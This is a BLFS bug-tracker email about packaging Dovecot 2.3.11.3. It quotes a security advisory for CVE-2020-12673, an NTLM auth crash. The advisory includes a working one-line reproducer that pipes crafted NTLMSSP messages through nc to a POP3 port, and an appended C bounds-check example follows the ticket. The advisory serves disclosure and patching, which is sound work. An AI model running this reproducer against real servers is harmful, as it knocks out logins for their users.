#13915: dovecot-2.3.11.3
-------------------------+------------------------
 Reporter:  renodr       |       Owner:  blfs-book
     Type:  enhancement  |      Status:  new
 Priority:  high         |   Milestone:  10.0
Component:  BOOK         |     Version:  SVN
 Severity:  normal       |  Resolution:
 Keywords:               |
-------------------------+------------------------

Comment (by renodr):

 '''Email from oss-security regarding CVE-2020-12673'''

 {{{
 Open-Xchange Security Advisory 2020-08-12

 Affected product: Dovecot IMAP server
 Internal reference: DOP-1870 (Bug ID)
 Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
 Vulnerable version: 2.2
 Vulnerable component: auth
 Fixed version: 2.3.11.3
 Report confidence: Confirmed
 Solution status: Fix available
 Vendor notification: 2020-05-03
 CVE reference: CVE-2020-12673
 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

 Vulnerability Details:
 Dovecot's NTLM implementation does not correctly check message buffer
 size, which leads to reading past allocation which can lead to crash.

 Risk:
 An adversary can use this vulnerability to crash dovecot auth process
 repeatedly, preventing login.

 Steps to reproduce:
 (echo 'AUTH NTLM'; echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | \
 base64 -w0 ;echo ;echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00'| \
 base64 -w0;echo ; echo QUIT)  | nc 127.0.0.1 110

 Workaround:
 Disable NTLM authentication.

 Solution:
 Upgrade to fixed version.

 Best regards,
 Aki Tuomi
 Open-Xchange oy
 }}}

--
Ticket URL: <http://wiki.linuxfromscratch.org/blfs/ticket/13915#comment:3>
BLFS Trac <http://wiki.linuxfromscratch.org/blfs>
Beyond Linux From Scratch
-- 
http://lists.linuxfromscratch.org/listinfo/blfs-book
FAQ: http://www.linuxfromscratch.org/blfs/faq.html
Unsubscribe: See the above information page
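
Added example, not part of the ticket or the advisory and not Dovecot's code or its fix: a bounds check of the kind whose absence the advisory describes, applied to the security-buffer descriptors of an NTLM type 3 message. The descriptor layout and offsets are assumed from the public MS-NLMP specification, the advisory does not say which field is affected, and the names ntlm_get_field and ntlm_check_type3 are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Descriptor layout assumed from MS-NLMP:
 * Len (2 bytes LE), MaxLen (2 bytes LE), BufferOffset (4 bytes LE). */
struct ntlm_field { const uint8_t *data; uint16_t len; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
/* Hypothetical helper: returns 0 and fills *out only when the descriptor at
 * desc_off and the bytes it points to both lie inside msg[0..msg_len). */
int ntlm_get_field(const uint8_t *msg, size_t msg_len, size_t desc_off,
                   struct ntlm_field *out)
{
    if (desc_off > msg_len || msg_len - desc_off < 8)
        return -1;                      /* descriptor itself is truncated */
    uint16_t len = rd16(msg + desc_off);
    uint32_t off = rd32(msg + desc_off + 4);
    /* Subtraction form: off + len is never computed, so it cannot wrap. */
    if (off > msg_len || msg_len - off < len)
        return -1;                      /* payload would end past the message */
    out->data = msg + off;
    out->len = len;
    return 0;
}
/* Checks a type 3 (AUTHENTICATE) message: signature, type, and the six
 * descriptors at offsets 12..52 (LM, NT, domain, user, workstation, key). */
int ntlm_check_type3(const uint8_t *msg, size_t msg_len)
{
    struct ntlm_field f;
    if (msg_len < 12 || memcmp(msg, "NTLMSSP", 8) != 0 || rd32(msg + 8) != 3)
        return -1;
    for (size_t d = 12; d <= 52; d += 8)
        if (ntlm_get_field(msg, msg_len, d, &f) != 0)
            return -1;
    return 0;
}
int main(void)
{
    uint8_t m[72] = {0};                /* constructed sample, not a capture */
    memcpy(m, "NTLMSSP", 8);
    m[8] = 3; m[36] = 6; m[38] = 6; m[40] = 64;  /* user: 6 bytes at offset 64 */
    memcpy(m + 64, "orange", 6);
    int ok = ntlm_check_type3(m, sizeof m);
    m[40] = 70;                         /* 70 + 6 > 72: must be rejected */
    printf("valid=%d overrun=%d\n", ok, ntlm_check_type3(m, sizeof m));
    return 0;
}
```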
